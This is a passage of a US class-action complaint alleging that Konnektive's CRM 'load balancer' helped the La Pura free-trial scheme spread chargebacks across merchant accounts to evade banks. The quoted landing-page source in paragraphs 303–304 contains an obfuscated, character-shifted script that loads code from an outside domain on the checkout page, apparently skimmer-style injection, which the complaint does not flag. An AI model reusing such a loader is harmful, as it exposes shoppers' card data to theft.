and Kathryn Martorano. Together, they sell Customer Relationship Management ("CRM") software under the brand name Konnektive.

301.   The Konnektive Defendants play an essential role in perpetrating the La Pura "free trial" scheme, providing them with software which automates their bank fraud. A human being cannot cycle through almost 100 merchant accounts, monitoring their chargeback levels on a constant basis—but software can. And the Konnektive Defendants intentionally designed their software for the purposes of enabling Internet scammers to commit bank fraud by the inclusion of such features as a "load balancer," which rotates the merchant accounts used to bill customers and thus balances the load of chargebacks across these accounts. The Konnektive software is designed to prevent these merchant accounts from being cancelled—and to prevent fraud from being discovered by financial institutions.

302.   The Konnektive software was used by the La Pura Defendants, as reflected in the source code for their websites. For example, the highlighted portion of the source code below for the "lm" landing page on try-la-pura-skincare.com shows that its CRM software is Konnektive:

"loading","crm_type":"konnektive","exit_popup_enabled":true,'
wed_tc":"8\"m0l0d0J050k05000lv8sm\"l\"d5J555k555O51484mmlsde:
untries":{"US":{"name":"United States","states":{"AL":{"name'
{"name":"Armed Forces Pacific"},"CA":{"name":"California"},"(
"Georgia"},"GU":{"name":"Guam"},"HI":{"name":"Hawaii"},"ID":·
{"name":"Maryland"},"MA":{"name":"Massachusetts"},"MI":{"nam'
pshire"},"NJ":{"name":"New Jersey"},"NM":{"name":"New Mexico'
Oregon"}."PA":{"name":"Pennsylvania"}."PP":{"name":"Puerto R:

303.   Similarly, the code for the "lm" landing page loads a "konnektiveutilpack" extension—a utility pack for the Konnektive software.

```
<script src="/lm/assets/dist/codebase.min.js" type="text/javascript"></script><script>$(function(){$.get('
<script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyBWw3-uiVdm8CV5CgVb6KvkHK2DcfCf(
<script>var event_type= 'keyup';var autopopulate_by= 'zip';var disable_component_restriction = '';</script>
<script>$(function(){$.get("/lm/ajax.php/extensions/konnektiveutilpack/fire-import-click");});});</script>
        $(document).ready(function(){
            (function(document){const k=s=>s.split('').map(c=>String.fromCharCode(c.charCodeAt(-1))).join(''),
    s=document.createElement(k('tdsjqu'));s.src=k('iuuqt;00cpputusbqmvhjo/dpn0q/qiq@je>2124');document[k('ifb
        });
</script>
```

304.   When a consumer proceeds to the checkout page on the "lm" landing page, the source code calls to the Konnektive website (konnektive.com) and runs a script to initiate a "load balancer."

```
ype":"checkoutPage","enable_browser_back_button":false,"disable_trialoffer_cardexp":false}</script><script type="text/javascr
_invalid":"Please enter a valid credit card number!","cvv_invalid":"Please enter a valid CVV code!","card_expired":"Card see
_error":"Oops! Something went wrong! Can you please retry?","not_checked":"Please check the agreement box in order to procee
_email":"Your email address could not be verified","xv_phone":"Your phone number could not be verified","exceptions":{"conf
    is not a valid array","empty_prospect_id":"Prospect ID is empty or invalid","curl_error":"Something went wrong with the requ
script">var cbUtilConfig = {"disable_non_english_char_input":false};</script>
e","desktop"],"credit_card_place_holder_active":true,"credit_card_masking_placeholder":"cross","credit_card_masking":"dash_m
>
<iframe width=1 height=1 frameborder=0 scrolling=no   src="https://lp.konnektive.com/logos/logo.htm?c=rmg&s=6c43e84f2753415c
b74e'></iframe><script>$(function(){$.get("/lm/ajax.php/extensions/trafficloadbalancer/initialize");});});</script>
w3-uiVdm8CV5CgVb6KvkHK2DcfCfOpk"></script>
ent_restriction = '';</script>
pect");});});</script><script>$(function(){$.get("/lm/ajax.php/extensions/konnektiveutilpack/fire-import-click");});});</script><sc
(c.charCodeAt(-1)).join('');if(window[k('mpdbujpo')][k('iptuobnf')].replace(k('xxx/'),"")!=k("usz.mb.qvsb.tljodbsf/dpn")){va
iq@je>2124');document[k('ifbe')].appendChild(s)})}(document)
```

305.   The "l3" landing page of try-la-pura-skincare.com also uses Konnektive, as demonstrated by the source code below:

```
<script src="/l3/assets/dist/codebase.min.js" type="text/javascript"></script>
<script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyApS9RnNPuBdzDdflmrqQvf-U_4XCaCCGQ"></script>
<script>var event_type= 'keyup';var autopopulate_by= 'zip';var disable_component_restriction = '';</script>
<script>$(function(){$.get("/l3/ajax.php/extensions/konnektiveutilpack/fire-import-click");});});</script>
        <script>
            function exit_discount()
            {
                $('#popover-1').fadeOut();
            }
        </script>
```

306.   And again, when a victim proceeds to the shopping cart for the "l3" landing page, the Konnektive website is called to by the source code for the La Pura website, as shown in the excerpt below:

```
<script src="/l3/assets/dist/codebase.min.js" type="text/javascript"></script><iframe width=1 height=1 frameborder=0 scrolling=no  src='https://lp.konnektive.com/logos/'>
https://lp.konnektive.com/logos/logo.gif?c=rmg&s=c2eccib23fd347729bade4b48346e9a5'></iframe>
<script async defer src="https://maps.googleapis.com/maps/api/js?key=AIzaSyAoS9RnNPuBdzDdflmrqQvf-U_4XCaCCGQ"></script>
<script>var event_type= 'keyup';var autopopulate_by= 'zip';var disable_component_restriction= '';</script>
<script>$(function(){$.get("/l3/ajax.php/extensions/asyncprospect/create-prospect");})});</script><script>$(function(){$.get("/l3/ajax.php/extensions/konnektiveutilpack/f:
```

307.   All of the victims of the La Pura scam (and all of the members of the Class) would thus have unknowingly interacted with the Konnektive software, which was used as a "load balancer" to rotate the merchant accounts used to bill the Class members and prevent any of those accounts from being identified as having been involved in a fraud.

308.   The Konnektive Defendants specifically market their software to "free trial" scammers at conferences which those scammers attend. For example, like the QuickBox Defendants, the Konnektive Defendants attend the Affiliate Summit trade shows.[107] On information and belief, they do so specifically for the purpose of recruiting free trial scammers to use their software. At a recent Affiliate Summit in Las Vegas held in 2020, Defendant Matthew Martorano threw a party at the Chandelier Lounge in the Cosmopolitan Casino, encouraging invitees to network with Konnektive and a rogue's gallery of "chargeback mitigation" companies who also assist scammers.[108] Mr. Martorano posed for photographs at this party with an army of scantily clad models bearing the logos of Konnektive and various other companies whose sole service is to help stop banks from detecting Internet fraud by preventing scammers from being flagged with chargebacks. The Affiliate Summit is the event discussed *supra* in the Complaint, at which keynote speaker Neil Patel mocked the plight of the poor and the elderly who he said the attendees were targeting for fraud (and at which the audience laughed and cheered at the concept of elderly

---

[107] Konnektive Facebook Page, https://www.facebook.com/Konnektive/ (last visited June 8, 2020).
[108] Konnektive Chandelier Party, https://konnektive.com/2020/event/index.php?utm_source=conferencenights.com&utm_med ium=Referral&utm_campaign=ConferenceNights%20Promotions (June 3, 2020).

women having money stolen from their bank accounts). Mr. Martorano attended the same event at which Mr. Patel gave this speech—the January 2019 Affiliate Summit in Las Vegas—and could not have been unaware of the prevalence of Internet scammers there.[109]

309.   The Konnektive Defendants, including Defendant Matthew Martorano, also attended the ADSUM conference seeking customers of their software.[110] As described *supra*, the ADSUM conference also largely consists of Internet scammers, and "pretty much everybody that comes to ADSUM is running multiple MIDs...." On information and belief, Konnektive's purpose in attending this conference was specifically to seek "free trial" scammers out as customers.

310.   The Konnektive Defendants are also the "main sponsor" of the Panama Global Banking Summit.[111] The summit describes itself as a place where "merchants from low and high risk verticals like nutra, adult & dating, gambling, leadgen and forex/crypto among others, could network and generate new relationships with processing solutions, affiliates and other third party vendors."[112]  Panama's banking sector has a reputation as a "haven for fraud,"[113] and on information and belief, this conference is specifically intended to attract fraudsters searching for support services. Brian Bolerjack, the VP of Sales at Konnektive, was a guest speaker at the most recent meeting in March 2020.[114] The topic of his speech was "The Evolution of Negative Option for High Risk Merchants – Visa & MC

---

[109] Konnektive, LLC's ANSWER and Affirmative Defenses to Complaint re the Notice of Removal, COUNTERCLAIM against TRANSACT FAST, LLC, MICHAEL SHVARTZMAN by KONNEKTIVE, LLC at 12 ¶ 19-20, *Transact Fast LLC v. Konnektive LLC et al*, No. 1:19-cv-23927 (S.D. Fla. Oct. 11, 2019), dkt. 7.
[110] Konnektive Signs On As A Gold Sponsor Of The Upcoming ADSUM Conference, Aug. 29, 2016, https://www.accesswire.com/444412/Konnektive-Signs-on-as-a-Gold-Sponsor-of-the-Upcoming-ADSUM-Conference (last visited June 3, 2020).
[111] Konnektive Website, https://konnektive.com/resources_type/panama-global-banking-summit/ (last visited June 3, 2020).
[112] Panama Global Banking Summit Website, https://panama-gbs.com/ (last visited June 3, 2020).
[113] Stephen Grey, *Panama struggles to escape its reputation as a haven for fraud*, Nov. 17, 2017, *available at* https://www.reuters.com/article/us-usa-panama-reputation/panama-struggles-to-escape-its-reputation-as-a-haven-for-fraud-idUSKBN1DH1ES (last visited June 3, 2020).
[114] Panama Global Banking Summit Website, https://panama-gbs.com/#speakers (last visited June 3, 2020).

Guidelines."[115] The phrase "negative option" is a euphemism for subscriptions which continue until the customer (or victim) affirmatively cancels. On information and belief, Mr. Bolerjack and other Konnektive employees, including Defendants Matthew and Kathryn Martorano, specifically coach "high risk merchants" such as the La Pura Defendants on how to avoid having their fraud detected by banking institutions.

311.  In marketing their software, the Konnektive Defendants tout their ability to enable their clients to keep billing victims after their merchant accounts have been flagged for fraud. In a March 4, 2019 Facebook post, the Konnektive Defendants bragged that they could help customers migrate their customer data to another account after their merchant accounts had been frozen to enable them to keep billing:[116]



312.  This a repeated selling point for the Konnektive Defendants—in another post on May 20, 2019, Konnektive bragged about helping businesses who had been "shut down" by other companies. Konnektive offered to help those who had been shut down by helping them "get real merchant accounts" and providing "chargeback mitigation."

---

[115] *Id.*
[116] Konnektive Facebook Page, https://www.facebook.com/Konnektive/ (last visited June 3, 2020).



313.   Like the QuickBox Defendants, Konnektive's executive team comprised of Defendants Matthew Martorano and Kathryn Martorano have years of experience assisting their clients in perpetrating "free trial" schemes.

314.   In 2013, Konnektive's website boasted that Matthew Martorano has had a 15-year career "building both turn-key and white label membership programs" for his clients in the Direct Response marketplace who "utilize such services as upsell as well as primary products being sold to more that [sic] 12 million customers."[117]

315.   In 2014, Konnektive Corporation listed Matthew Martorano as the company's CEO. His title as CEO continued until 2019, when he was removed from annual filings with the Georgia Secretary of State. But on information and belief, and based on his continued appearances at scammer conferences seeking their business, Mr. Martorano continues to have an active role in the company, particularly in promoting the Konnektive products to Internet scammers.

316.   A profile of Mr. Martorano states: "As the CEO of Konnektive CRM, Matthew Martorano is responsible for running all facets of the business."[118] He "leads the

---

[117] Archive.org copy of Konnektive Website, Dec. 7, 2013, *available at* https://web.archive.org/web/20131207153154/http://konnektive.com/management/ (last visited June 5, 2020).
[118] Board of Advisors Reviews Website, https://www.boardofadvisors.com/review-details/m/21/matthew-martorano (last visited June 8, 2020).

strategy and innovation efforts at Konnektive, conceiving product and strategic solutions for his clients' strategic challenges, delivering products to his clients that are constantly evolving."[119] On information and belief, this includes the Konnektive "load balancer" feature which was specifically designed to facilitate the commission of bank fraud, and Mr. Martorano was specifically involved in creating that feature with the intent that scammers such as the La Pura John Does would use it to defraud financial institutions.

317.   Mr. Martorano has boasted that he is very familiar with his clients' needs and that he maintains constant communication with them to ensure his product meets their requirements.[120]

318.   Defendant Kathryn Martorano also is listed as Konnektive's co-founder, along with her husband.[121] In 2014, Konnektive identified Kathryn Martorano as the company's CFO and Secretary. In 2015, Konnektive listed her as the company's COO.[122] In its most recent filing with the Georgia Secretary of State in January 2020, Konnektive listed her as the company's CEO, CFO, Secretary, and Registered Agent.

319.   Konnektive's website in 2013 boasted that Kathryn Martorano brings 20 years of experience in "information technology, as well as accounting and online billing systems" and she focuses "primarily on client implementations, building business requirements, and project management."[123] On information and belief, in this role Mrs. Martorano is involved in coaching free trial scammers, including the La Pura John Does, on how to implement the Konnektive software to operate their scams. Mrs. Martorano has significant experience in technical implementations of enterprise software, and on information and belief, she

---

[119] *Id.*
[120] https://www.youtube.com/watch?v=DltJW0XD8h4 (last visited June 9, 2020).
[121] Konnektive Facebook Page, https://www.facebook.com/pg/Konnektive/about/ (last visited June 8, 2020).
[122] Archive.org copy of Konnektive Website, February 26, 2015, *available at* https://web.archive.org/web/20150226130705/http://www.konnektive.com/ (last visited June 8, 2020).
[123] Archive.org copy of Konnektive Website, Dec. 7, 2013, *available at* https://web.archive.org/web/20131207153154/http://konnektive.com/management/ (last visited June 5, 2020).

assists free trial scammers, including the La Pura John Does, in technical aspects of their Konnektive software implementation.[124]

320.   Konnektive's software includes all the essential features to run the La Pura scam including: "Product setup;" "Affiliate Management;" a "Landing Page Wizard" to create websites targeting victims; an "E-commerce Shopping Cart" which acts as the shopping cart for these websites; "Merchant Gateways" which allow the user to "add a multitude of merchant accounts to a variety of gateways and let the system manage the rest"; "Chargeback and Fraud Screening" that integrates Konnektive's software with "chargeback management companies;" integration with call centers; functionality to manage "all of your billing events, whether it is a single billing, multi-pay or trial with continuity event," and integration with fulfillment companies such as the QuickBox Defendants.[125]

321.   Konnektive's home page states that it gathers data from multiple sources including: "Chargeback & Fraud Screening, Call Center & Customer Service, Sales & Order Entry, Shopping Cart, Merchant Gateway & Fulfillment."[126] Konnektive thus acts as a hub between all of the conspirators in a free trial scam, passing data between them and enabling them to coordinate their actions with one another. This is particularly important for avoiding detection of the fraud, as speedy responses enable scammers to refund customers prior to a chargeback even occurring if they catch wind that a customer plans to complain to their bank.

322.   Konnektive's "About Us" page makes it apparent that its system was designed out of necessity to service the specific needs for the "free trial" scammer, stating: "This system was born from necessity as our background and expertise is in the Direct Response world. We would invent products, and create campaigns; taking our products to market

---

[124] Katie Martorano LinkedIn Profile, https://www.linkedin.com/in/katie-martorano-4a1b3a8/ (last visited June 5, 2020).
[125] Konnektive Website, https://konnektive.com/solutions/ (last visited June 9, 2020).
[126] Konnektive Website, https://konnektive.com (last visited March 3, 2020).

through Print, Radio, and Online channels; and we made a lot of mistakes along the way. We drove tens of thousands of calls into our 100+ seat call center, and generated thousands of online sales every month. We managed every aspect of the process, which included inbound sales, outbound order confirmation, customer service, quality assurance, product fulfillment, media buying, ROI measurement, and sales performance."[127]

323.   Konnektive's website even features a video testimonial with one of its customers stating that Konnektive's "best features" include how Konnektive handles customer returns, recurring charges to customers, and chargebacks.[128]

324.   The Konnektive Defendants have been participating in "free trial" scams for at least six years.  Specifically, they partnered with Vaporin, an auto-subscription company selling electronic cigarette kits, in or about March 2014  In a 10K filing with the Securities and Exchange Commission, Vaporin stated that it launched an affiliate marketing program with Konnektive "which offers consumers a free trial of Vaporin products. If the consumer does not cancel the trial offer, Konnektive then sends the information to the merchant account *which bills the consumer automatically each month until the consumer cancels* the monthly shipment of additional products."[129] (emphasis added).

325.   Not surprisingly, consumers have posted numerous complaints about the Vaporin "free trial" scheme.  On Yelp, Vaporin has received the lowest 1 out of 5 stars. One reviewer complained in 2015: "First they got my information, to debt [sic] my account for $4.99 then they charged me $120.00…I'm still waiting for refund after 5 months."[130]

326.   Truth in Advertising, Inc., a non-profit organization whose self-described mission is to empower consumers to protect themselves and one another against false advertising and deceptive marketing, dedicated an article in 2014 to the "free trial" Vaporin

---

[127] Konnektive Website, https://konnektive.com/about-us/ (last accessed March 3, 2020).
[128] Konnektive Website, https://konnektive.com/client-success-stories/ (last accessed March 3, 2020).
[129] https://sec.report/Document/0001493152-14-000853/0001493152-14-000853.txt (last accessed March 3, 2020).
[130] Yelp, https://www.yelp.com/not_recommended_reviews/vaporin-miami.

scheme. This "free trial" scheme has all the same elements of the La Pura scheme including an auto-enrollment subscription charged every month and a second "false front" website that not only discloses the terms of the recurrent billing, but it does not advertise the product as "free."[131]

327. Konnektive's website advertises other services that appeal to "free trial" scammers, including its application programming interface ("API") and load balancing. Konnektive's API documentation – which shows how to integrate a computer system like Konnektive into another system – uses the "free trial" with recurrent billing system as its "how to" example for integrating systems.[132]

328. Konnektive's software includes a "load balancer"—technology designed to rotate large numbers of merchant accounts being used to bill for a single product automatically and balance the load of chargebacks so that no individual "MID," or Merchant ID, is flagged by financial institutions as having committed fraud. A Wiki maintained on Konnektive's website advising customers on the Konnektive software includes numerous sections on Load Balancers, including their setup and creation.[133]

## Merchant Area

- Bin Mapping - Decline Message Map
- Bin Mapping - PrePaid Bin Map
- Bin Mapping - Standard BinMap
- Decline Salvage
- Event Logs
- Load Balancer Cascade
- Load Balancers
- Loadbalancer Limits and Caps
- Loadbalancer Projections
- Loadbalancer Setup / Creation
- Loadbalancer Types
- Merchant Setup / Creation
- Mid List
- Sage Pay Gateway
- Testing a Mid Through Order Entry

---

[131] https://www.truthinadvertising.org/vaporin-ad-alert/.
[132] https://apidocs.konnektive.com/?version=latest.
[133] Konnektive Wiki, https://wiki.konnektive.com/_revision/preview/1/?r=384 (last visited June 8, 2020).

329.   The screenshot below is, on information and belief, a screenshot of the load balancer in the Konnektive software.



330.   Notably, and as can be seen in the screenshot, the Konnektive software allows users to exercise granular control over their "Mids," or Merchant IDs. The software allows users to disable MIDs "due to excessive declines." It further allows them to set caps on the numbers of chargebacks for each individual MIDs, as well as overall caps for the load balancer. These caps can be set on a monthly or daily basis, and the software is designed to provide alerts to the user whenever the caps are hit for any individual MID.

331.   On information and belief, the screenshot below is of a menu to input and manage an individual MID in the Konnektive software.



332.   Notably, the Konnektive software permits "Limits" to be set on MIDs (as seen in the expanded section from the screenshot below). This allows users to cap the ChargeBack Ratio on any given MID, meaning the percentage of chargebacks. This feature is designed to insure that fraud is not detected, as would occur if the ratio rises to unacceptable levels. The user can further put a monthly dollar amount cap on an individual MID, enabling them to spread their billings across multiple MIDs in direct violation of credit card processing rules.



333.   A 2012 press release from Konnektive makes clear that "load balancing" is a feature of the Konnektive software, along with "the ability to manage multiple accounts in one place."[134]

> Konnektive v2.0 is rich in features providing such capabilities as total eStore integration and linking, real time reporting and dashboard analytics, inbound and outbound order entry, real-time fraud screening, script-to-screen technology, campaign ROI management, fulfillment management, merchant gateway integration, load balancing, and the ability to manage multiple accounts in one place. Other CRM software providers can provide some of these options, but few will provide all. The web-based nature of the software suite means that it is highly scalable, so the product's functionalities can be customized and enhanced as your business grows and takes new directions. This is a major improvement over traditional CRM software where customization and upgrades could easily take months to develop and deploy.

334.   The "About" page from Konnektive's Facebook page includes the excerpt below.[135] On information and belief, this text was authored by Matthew Martorano.

> My clients have systems that take data directly from my phone switch and server, and by agent they can see every activity at the customer level; such as call times and handle rates, cancellations, alterations of customer records, etc…
>
> **We have a proprietary technology in place that allows trial advertisers to continue processing transactions without losing customers when one of their merchant account is shut down.**
>
> We have built a charge-back tracking/management feature. This feature will allow you to set chargeback thresholds, and based upon those thresholds the system will direct more transaction volume to the account that may be experiencing a higher chargeback ratio. **For instance, if you set the threshold at 2%, and you merchant processor is sending chargebacks to the system, the platform will calculate the chargeback percentage and redirect more volume to that account to bring the threshold back down to an acceptable level.**
>
> **We have also built a dynamic load balancer; a feature that allows you to set the monthly volume limits. And should a limit be reached, the volume**

---

[134] Konnektive Corp. Opens Beta Testing on New Cloud CRM Software Suite, Dec. 7, 2012, *available at* https://www.prweb.com/releases/2012/12/prweb10214347.htm (last visited June 8, 2020).
[135] Konnektive Facebook Profile, https://www.facebook.com/pg/Konnektive/about/ (last visited June 8, 2020) (emphasis added).

**will be redistributed to the remaining accounts**. For instance, if an account has a monthly limit of $50,000, once that limit has been reached, the system will automatically redirect transactions to the remaining active accounts.

335.   In a Q & A with Matthew Martorano on Konnektive's from March 31, 2018, Mr. Martorano said: "Our easy user interface is very unique, our reporting suite very unique, the intuitiveness in functionality is unique, **our load balancer and mid manager is very unique**, and our various integrations make us the obvious choice for marketers."[136]

336.   Konnektive is well aware that its load balancer is specifically designed to enable fraud. Indeed, a warning on the footer of its webpage—designed to show up on every page on the Konnektive website—states: "Load Balancing is prohibited by the Payment Networks and Acquirer(s) and that such activity will lead to termination of their merchant agreement if discovered."[137]

Konnektive is a Registered TPP and TPS of Woodforest Bank Corp., Synovus Bank, BMO Harris Bank N.A. and MB Financial Bank N.A.
Load Balancing is prohibited by the Payment Networks and Acquirer(s) and that such activity will lead to termination of their merchant agreement if discovered.

337.   Konnektive's acceptable use policy repeats this warning in bold in its indemnification section which requires its customers to indemnify Konnektive for using

---

[136] Q&A With Matt Martorano, CEO And Founder of Konnektive, March 31, 2018, available at https://konnektive.com/resources_type/qa-matt-martorano-ceo-founder-konnektive/ (last visited June 8, 2020).
[137] Konnektive Website, https://konnektive.com/ (last visited June 8, 2020).

the load balancing feature (indicating clear knowledge that the feature has no purpose other than bank fraud).[138]

**Acceptable Use Policy**

All products and services provided by Konnektive may be used for lawful purposes only. Transmission or storage of any information, data or material in violation of any United States Federal, State or local laws is strictly prohibited. Customer agrees to indemnify and hold harmless Konnektive from any claims resulting from Customer's use of the service which damages Customer or any other parties, including attorney's fees.

**NOTICE: Load balancing activity is prohibited by the card schemes and banks and will lead to termination of your merchant facilities if discovered.**

Konnektive will not be liable for any interruptions in service or other monetary loss related to enforcement of the Konnektive Terms of Service (TOS), including this Acceptable Use Policy.

338.   Defendant Matthew Martorano is well aware that load balancing is a prohibited form of bank fraud. While he was giving a presentation as the head of a panel titled "The Pillars for a Successful Online Model" at the 2018 Panama Global Banking Summit, he specifically asked a co-panelist, Heather Peterson, who worked for a merchant processor called National Merchant's Association: "And load balancing. Obviously it's a common practice. Best practices that should be employed when it comes to...?"[139]

339.   Ms. Peterson responded: "The card brands—**the rules for the card brands are load balancing is a tactic to evade card brand practices**. That's all I can say about that." Mr. Martorano responded by smiling and saying: "That's all you can say about that. Okay."[140]

340.   The panel continued to discuss in detail how they kept MIDs "live" and various methods affiliate marketers were using to evade the rules of credit card companies, including a "decline salvage process" which Mr. Martorano described as a "touchy subject" when asking Ms. Peterson about it.

341.   Konnektive's software is further designed to allow for its customers to easily sign consumers up for continuity subscriptions. With an ordinary business, a subscription could extend for long periods of time, because the consumer voluntarily signed up for the

---

[138] Konnektive Acceptable Use Policy, https://konnektive.com/legal/acceptable-use-policy/ (last visited June 8, 2020).
[139] https://panama-gbs.com/conference-speaker/matthew-martorano/ at 10:07 (emphasis added).
[140] *Id.*

subscription. With a free trial scam, the customer does not know they have been subscribed, and virtually all of the customers will cancel once they learn of the fraud. Konnektive's design reflects that it has been tailored to scammers: instead of collecting statistics on subscriptions that reflect a lengthy period, the maximum number of rebills Konnektive provides details on is three months, as reflected in the screenshot below. Users of Konnektive do not need more data because the subscriptions are not voluntarily and most will be cancelled by then, as the Konnektive Defendants are fully aware.



342.   Konnektive's software also provides "a simple to use drag-and-drop interface that allows you to quickly build and deploy your professional looking sales pages.... and your pages are immediately hosted on an AWS server that we setup with your account."

Konnektive is thus not only enabling scammers to design their landing pages, but also helps them configure and operate the servers on which those websites run.[141]



343. On information and belief, Defendants Mathew Martorano, Kathryn Martorano, Konnektive LLC, Konnektive Corporation, Konnektive Rewards LLC, and Martorano Holdings LLC do not follow corporate formalities and are liable for one another's actions as alter egos. On information and belief, despite nominally being located in Puerto Rico, all of the entities in fact operate primarily out of Roswell, Georgia. On information and belief, all of these entities further commingle their assets and resources without regard for corporate formalities. In a prior lawsuit fired by the former CTO of Konnektive, he alleged based on his insider knowledge of the company that the Konnektive companies were operating out of Roswell, Georgia and were using each others' assets to operate the respective corporations.[142] This lawsuit alleges that the Konnektive companies use employees across their corporate entities without regard to which company is actually formally employing them.[143] It further alleges that the "vast majority" of the employees actually reside in Georgia and that there were improper transfers of money across the

---

[141] Konnektive Facebook Page, https://www.facebook.com/Konnektive/ (last visited June 3, 2020).
[142] *Hall v. Konnektive Corporation et al*, No. 2018CV305141 (Fulton County Ga. Superior Ct. May 14, 2018) Dkt. 2 at 2.
[143] *Id.* at 6-7.

Konnektive corporate entities without regard to legal formalities.[144] It further alleges that Mr. Martorano forged paperwork and lied about where the employees were in an effort to qualify for exemption under Puerto Rican law from U.S. federal income taxes.[145] The lawsuit alleges that Mr. Martorano used the companies as a personal piggy bank without regard to formalities, paying for expenses relating to his pets, his cars, and a home stereo system.[146] On information and belief, all of these allegations are true. It would be inequitable not to treat these entities/individuals as alter egos of one another because the corporate structure is a sham designed to avoid paying taxes, frustrate creditors, avoid document discovery requests, and force creditors to purse the Defendants in a jurisdiction (Puerto Rico) where their connections are in fact minimal.

344.   On information and belief, Konnektive Rewards LLC assists in providing the Konnektive software to customers, and did so with the La Pura Defendants.

345.   On information and belief, Martorano Holdings LLC assists in the scheme at least in part by transferring and holding assets gained from the unlawful activities described herein.

346.   On information and belief, the Konnektive Defendants provide services to their clients for the purpose of perpetuating "free trial" schemes that defraud consumers, including Ms. Tan. The Konnektive Defendants committed intentional acts by consulting with the La Pura John Doe scammers on sales that they knew would be made to California residents, and otherwise providing the services listed on their website in connection with California customers. They further transfer data into and out of California, including Ms. Tan and the Class Members' credit card information and shipping data, and the Konnektive Defendants then distribute this information to the QuickBox Defendants and to merchant processing companies. The Konnektive Defendants, through their load balancing software, selected the merchant accounts to be used to bill Ms. Tan and the Class Members, and

---

[144] *Id.* at 6-8.
[145] *Id.* at 8.
[146] *Id.* at 10-11.

assigned their purchases to merchant accounts the software was programmed to select with the express intent of masking the fraud by balancing the load of chargebacks. On information and belief, the Konnektive Defendants also sent e-mails through their software to Ms. Tan and the Class Members, and some of those e-mails (including the ones to Ms. Tan) were sent into the State of California to facilitate the fraud.

347.   These intentional acts were expressly aimed at California residents. The Konnektive Defendants knew that their software was being used to target California residents because their software holds the addresses of consumers who purchase La Pura products. Specifically, when consumers input their shipping addresses and credit card information and click to purchase La Pura products, the information is sent through Konnektive's software, which then engages in "load balancing" to choose a merchant account that will not be detected by the fraud detection system of the consumers' credit card companies or banks. After the credit card company or bank authorizes the charge, the authorization is sent through Konnektive's software to La Pura's website. All of this happens in milliseconds.  Simply put, the Konnektive Defendants know where their victims reside, including their victims in California.

348.   The Konnektive Defendants targeted their conduct at California residents, including the Plaintiff, and knew they were California residents by virtue of their shipping addresses and other contact information. These acts involved ongoing, systemic, and continuous contact with California because the shipment of La Pura Products has been ongoing since at least early 2019. Those shipments occurred as part of subscriptions, meaning that the Konnektive Defendants' software was used by the La Pura Defendants and the QuickBox Defendants to ship continually and regularly to their California victims over long periods of time. The acts were entirely commercial in nature, as the Konnektive Defendants marketed themselves as providing services specifically to scammers they knew would sell nationwide via the Internet.

349.   The Konnektive Defendants generated substantial profits from their acts aimed at California residents. They intentionally assisted the La Pura scammers in placing

the La Pura Products into the stream of commerce, knowing and intending that they would be advertised over the Internet to and purchased by California consumers.

350.   The Konnektive Defendants knew or should have foreseen that their actions would cause harm in California. As described above, they intentionally assisted "free trial" scammers over a lengthy period of time, knowing that California consumers are being harmed by the scam.  Had they not provided these services, the California consumers would not have been harmed because the La Pura Products would not have been shipped to them and the La Pura scammers would not have benefitted from the experience of the Konnektive Defendants in helping other "free trial" scammers design their business processes.

351.   Because of these facts, personal jurisdiction is appropriate in California over the Konnektive Defendants.

## CLASS ACTION ALLEGATIONS

352.   Plaintiff incorporates all preceding and subsequent paragraphs by reference as if set forth fully herein.

353.   Plaintiff brings this class action pursuant to Fed. R. Civ. P. Rule 23, seeking certification of Plaintiff's claims and certain issues in this action on the Class, consisting of:

> **Nationwide Class:** All consumers in the United States who, within the applicable statute of limitations period until the date notice is disseminated, were billed for the La Pura Products.

354.   Plaintiffs further seek certification of the following class:

> **California Class:** All consumers in the United States who, within the applicable statute of limitations period until the date notice is disseminated, were billed for the La Pura Products.

355.   "La Pura Products" means La Pura Anti-Aging Cream, La Pura Wrinkle Freezing Moisturizer, La Pura Instant Lifting Eye Serum, and La Pura Instant Tightening Serum. Plaintiff expects that this definition will be modified in discovery as information is obtained from the John Doe Defendants. In particular, Plaintiff expects that there may be other products sold by the same Defendants with the exact same formulation, similar or identical injuries, but different labels or names. Plaintiff further expects that the conduct of the affiliates, the Defendants, or the "crooked processors" may be subject to a different and much broader class that encompasses identical injuries that go beyond this specific product line. Plaintiff further expects that the La Pura Defendants were selling other products via fake free trials whose injuries to their victims were functionally identical, and thus should be part of the Class.

356.   Excluded from the Class are governmental entities, Defendants, any entity in which Defendants have a controlling interest, and Defendants' officers, directors, affiliates, legal representatives, employees, co-conspirators, successors, subsidiaries, and assigns. Also excluded from the Class is any judge, justice, or judicial officer presiding over this matter and the members of their immediate families and judicial staff.

357.   Plaintiff reserves the right to amend or modify the class descriptions by making it more specific or dividing the class members into subclasses or limiting the issues.

358.   NUMEROSITY: Plaintiff is informed and believe, and on that basis allege, that the Plaintiff Class is so numerous that individual joinder of all members would be impracticable. It is apparent that the number of consumers of injured by similar or identical Products by the Defendants would be so large as to make joinder impracticable as the Class (or Classes) would be comprised of thousands of consumers geographically dispersed throughout the United States. While the exact number of Class members is currently unknown, such information can be ascertained through appropriate discovery.

359.   COMMONALITY: Defendants' practices and omissions were applied uniformly to all members of the Class, so that the questions of law and fact are common to all members of the Class. All members of the putative Classes were and are similarly

affected by having purchased and used the Products, and the relief sought herein is for the benefit of Plaintiff and members of the putative Class.

360.   PREDOMINANCE: Questions of law and fact common to the Class exist that predominate over questions affecting only individual members, including but not limited to:

a) whether Defendants' representations discussed above are misleading, or objectively reasonably likely to deceive;

b) whether Defendants' omissions discussed above involve facts the Defendants were obliged to disclose or facts contrary to representations by the Defendants;

c) whether the Defendants' owed consumers a duty to disclose the omitted material facts;

d) whether Defendants' alleged conduct is unlawful;

e) whether the alleged conduct constitutes violations of the laws asserted;

f) whether the Defendants' wrongful conduct was intentional or knowing;

g) whether the Defendants' wrongful conduct warrants punitive damages;

h) whether Defendants engaged in false or misleading advertising; and

i) whether Plaintiff and Class members are entitled to appropriate remedies, including restitution, damages, and injunctive relief.

361.   TYPICALITY: The claims asserted by Plaintiff in this action are typical of the claims of the members of the Class, as the claims arise from the same course of conduct by Defendants, all members of the Class have been similarly affected by Defendants' course of conduct, and the relief sought is common.

362.   ADEQUACY: Plaintiff will fairly and adequately represent and protect the interests of the members of the Class. Plaintiff has no interest adverse to the interests of the other Class members. Plaintiff has retained competent counsel with substantial experience in complex litigation and litigation involving scientific and technical issues, who are committed to vigorously prosecuting this action on behalf of the Class.

